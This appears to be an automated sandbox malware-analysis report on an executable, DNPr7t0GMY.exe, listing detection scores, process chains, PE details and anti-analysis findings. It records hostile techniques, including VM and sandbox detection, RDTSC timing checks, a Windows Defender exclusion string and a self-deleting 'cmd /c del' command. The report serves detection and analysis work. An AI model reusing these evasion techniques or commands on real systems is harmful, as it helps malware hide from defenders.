          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: DNPr7t0GMY.exeVirustotal: Detection: 55%
          Source: DNPr7t0GMY.exeMetadefender: Detection: 34%
          Source: DNPr7t0GMY.exeReversingLabs: Detection: 60%
          Source: unknownProcess created: C:\Users\user\Desktop\DNPr7t0GMY.exe 'C:\Users\user\Desktop\DNPr7t0GMY.exe'
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess created: C:\Users\user\Desktop\DNPr7t0GMY.exe C:\Users\user\Desktop\DNPr7t0GMY.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DNPr7t0GMY.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess created: C:\Users\user\Desktop\DNPr7t0GMY.exe C:\Users\user\Desktop\DNPr7t0GMY.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DNPr7t0GMY.exe'
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: DNPr7t0GMY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: DNPr7t0GMY.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: DNPr7t0GMY.exeStatic file information: File size 1325568 > 1048576
          Source: DNPr7t0GMY.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x142e00
          Source: DNPr7t0GMY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: DNPr7t0GMY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msdt.pdbGCTL source: DNPr7t0GMY.exe, 00000004.00000002.272130410.0000000002D50000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: DNPr7t0GMY.exe, 00000004.00000002.271750109.000000000113F000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DNPr7t0GMY.exe, 00000004.00000002.271750109.000000000113F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jrFIryXeZK\src\obj\Debug\AppDomainTimerSafeHandle.pdb source: DNPr7t0GMY.exe
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jrFIryXeZK\src\obj\Debug\AppDomainTimerSafeHandle.pdb,L source: DNPr7t0GMY.exe
          Source: Binary string: msdt.pdb source: DNPr7t0GMY.exe, 00000004.00000002.272130410.0000000002D50000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B2A2 push cs; ret
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00415414 push esp; ret
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00414F46 push cs; ret
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_0041BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00415FC5 push ebp; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D2D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B2A2 push cs; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B3FB push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079B45C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00795414 push esp; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00794F46 push cs; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0079BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_00795FC5 push ebp; ret
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: DNPr7t0GMY.exe PID: 6428, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000007885E4 second address: 00000000007885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 000000000078896E second address: 0000000000788974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exe TID: 6432Thread sleep time: -104955s >= -30000s
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exe TID: 6476Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4968Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeThread delayed: delay time: 104955
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.238628073.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.238628073.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.238425527.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.237897554.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.232822320.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000005.00000000.238628073.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.238628073.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.238741130.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000000.232851476.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.237897554.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.237897554.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.238628073.000000000871F000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAJ
          Source: DNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: msdt.exe, 0000000A.00000002.478405573.0000000000D31000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000005.00000000.237897554.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4_2_00409B10 LdrLoadDll,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A61C mov eax, dword ptr fs:[00000030h]
